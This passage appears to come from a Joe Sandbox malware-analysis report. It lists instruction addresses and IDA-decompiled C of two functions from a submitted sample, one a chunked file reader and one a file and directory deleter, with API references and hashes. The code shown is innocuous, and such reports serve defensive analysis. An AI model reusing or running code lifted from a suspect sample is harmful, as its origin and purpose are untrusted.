                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x004073cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00407447
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040744d
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004073ce
                                                          0x004073cb

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                          • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                          • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                          • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E00403479(intOrPtr _a4) {
                                                          				intOrPtr _t11;
                                                          				signed int _t12;
                                                          				void* _t14;
                                                          				void* _t15;
                                                          				long _t16;
                                                          				void* _t18;
                                                          				intOrPtr _t31;
                                                          				intOrPtr _t34;
                                                          				intOrPtr _t36;
                                                          				void* _t37;
                                                          				intOrPtr _t49;
                                                          
                                                          				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                                          				 *0x42a26c = GetTickCount() + 0x1f4;
                                                          				if(_t34 <= 0) {
                                                          					L22:
                                                          					E0040302E(1);
                                                          					return 0;
                                                          				}
                                                          				E004035F8( *0x420f04);
                                                          				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                          				 *0x420f00 = _t34;
                                                          				 *0x420ef0 = 0;
                                                          				while(1) {
                                                          					_t31 = 0x4000;
                                                          					_t11 =  *0x420ef8 -  *0x420f04;
                                                          					if(_t11 <= 0x4000) {
                                                          						_t31 = _t11;
                                                          					}
                                                          					_t12 = E004035E2(0x414ef0, _t31);
                                                          					if(_t12 == 0) {
                                                          						break;
                                                          					}
                                                          					 *0x420f04 =  *0x420f04 + _t31;
                                                          					 *0x40ce80 = 0x414ef0;
                                                          					 *0x40ce84 = _t31;
                                                          					L6:
                                                          					L6:
                                                          					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                          						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                          						E0040302E(0);
                                                          					}
                                                          					 *0x40ce88 = 0x40cef0;
                                                          					 *0x40ce8c = 0x8000; // executed
                                                          					_t14 = E00406BB0(0x40ce68); // executed
                                                          					if(_t14 < 0) {
                                                          						goto L20;
                                                          					}
                                                          					_t36 =  *0x40ce88; // 0x40d0fe
                                                          					_t37 = _t36 - 0x40cef0;
                                                          					if(_t37 == 0) {
                                                          						__eflags =  *0x40ce84; // 0x0
                                                          						if(__eflags != 0) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _t31;
                                                          						if(_t31 == 0) {
                                                          							goto L20;
                                                          						}
                                                          						L16:
                                                          						_t16 =  *0x420ef4;
                                                          						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                          							continue;
                                                          						}
                                                          						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                          						goto L22;
                                                          					}
                                                          					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                          					if(_t18 == 0) {
                                                          						_push(0xfffffffe);
                                                          						L21:
                                                          						_pop(_t15);
                                                          						return _t15;
                                                          					}
                                                          					 *0x40ce60 =  *0x40ce60 + _t37;
                                                          					_t49 =  *0x40ce84; // 0x0
                                                          					if(_t49 != 0) {
                                                          						goto L6;
                                                          					}
                                                          					goto L16;
                                                          					L20:
                                                          					_push(0xfffffffd);
                                                          					goto L21;
                                                          				}
                                                          				return _t12 | 0xffffffff;
                                                          			}














                                                          0x00403489
                                                          0x0040349c
                                                          0x004034a1
                                                          0x004035d1
                                                          0x004035d3
                                                          0x00000000
                                                          0x004035d9
                                                          0x004034ad
                                                          0x004034c0
                                                          0x004034c6
                                                          0x004034cc
                                                          0x004034d7
                                                          0x004034dc
                                                          0x004034e1
                                                          0x004034e9
                                                          0x004034eb
                                                          0x004034eb
                                                          0x004034f4
                                                          0x004034fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00403501
                                                          0x00403507
                                                          0x0040350d
                                                          0x00000000
                                                          0x00403513
                                                          0x00403519
                                                          0x00403539
                                                          0x0040353e
                                                          0x00403543
                                                          0x00403549
                                                          0x0040354f
                                                          0x00403559
                                                          0x00403560
                                                          0x00000000
                                                          0x00000000
                                                          0x00403562
                                                          0x00403568
                                                          0x0040356a
                                                          0x0040358d
                                                          0x00403593
                                                          0x00000000
                                                          0x00000000
                                                          0x00403595
                                                          0x00403597
                                                          0x00000000
                                                          0x00000000
                                                          0x00403599
                                                          0x00403599
                                                          0x004035ac
                                                          0x00000000
                                                          0x00000000
                                                          0x004035bb
                                                          0x00000000
                                                          0x004035bb
                                                          0x00403574
                                                          0x0040357b
                                                          0x004035c8
                                                          0x004035ce
                                                          0x004035ce
                                                          0x00000000
                                                          0x004035ce
                                                          0x0040357d
                                                          0x00403583
                                                          0x00403589
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004035cc
                                                          0x004035cc
                                                          0x00000000
                                                          0x004035cc
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0040348D
                                                            • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: FilePointer$CountTick
                                                          • String ID:
                                                          • API String ID: 1092082344-0
                                                          • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                          • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                          • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                          • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 41%
                                                          			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                          				int _t9;
                                                          				long _t13;
                                                          				WCHAR* _t14;
                                                          
                                                          				_t14 = _a4;
                                                          				_t13 = E00406133(_t14);
                                                          				if(_t13 == 0xffffffff) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				_push(_t14);
                                                          				if((_a8 & 0x00000001) == 0) {
                                                          					_t9 = DeleteFileW();
                                                          				} else {
                                                          					_t9 = RemoveDirectoryW(); // executed
                                                          				}
                                                          				if(_t9 == 0) {
                                                          					if((_a8 & 0x00000004) == 0) {
                                                          						SetFileAttributesW(_t14, _t13);
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}






                                                          0x00405d2d
                                                          0x00405d38
                                                          0x00405d3d
                                                          0x00405d6d
                                                          0x00000000
                                                          0x00405d6d
                                                          0x00405d44
                                                          0x00405d45
                                                          0x00405d4f
                                                          0x00405d47
                                                          0x00405d47
                                                          0x00405d47
                                                          0x00405d57
                                                          0x00405d63
                                                          0x00405d67
                                                          0x00405d67
                                                          0x00000000
                                                          0x00405d59
                                                          0x00000000
                                                          0x00405d5b

                                                          APIs
                                                            • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                            • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
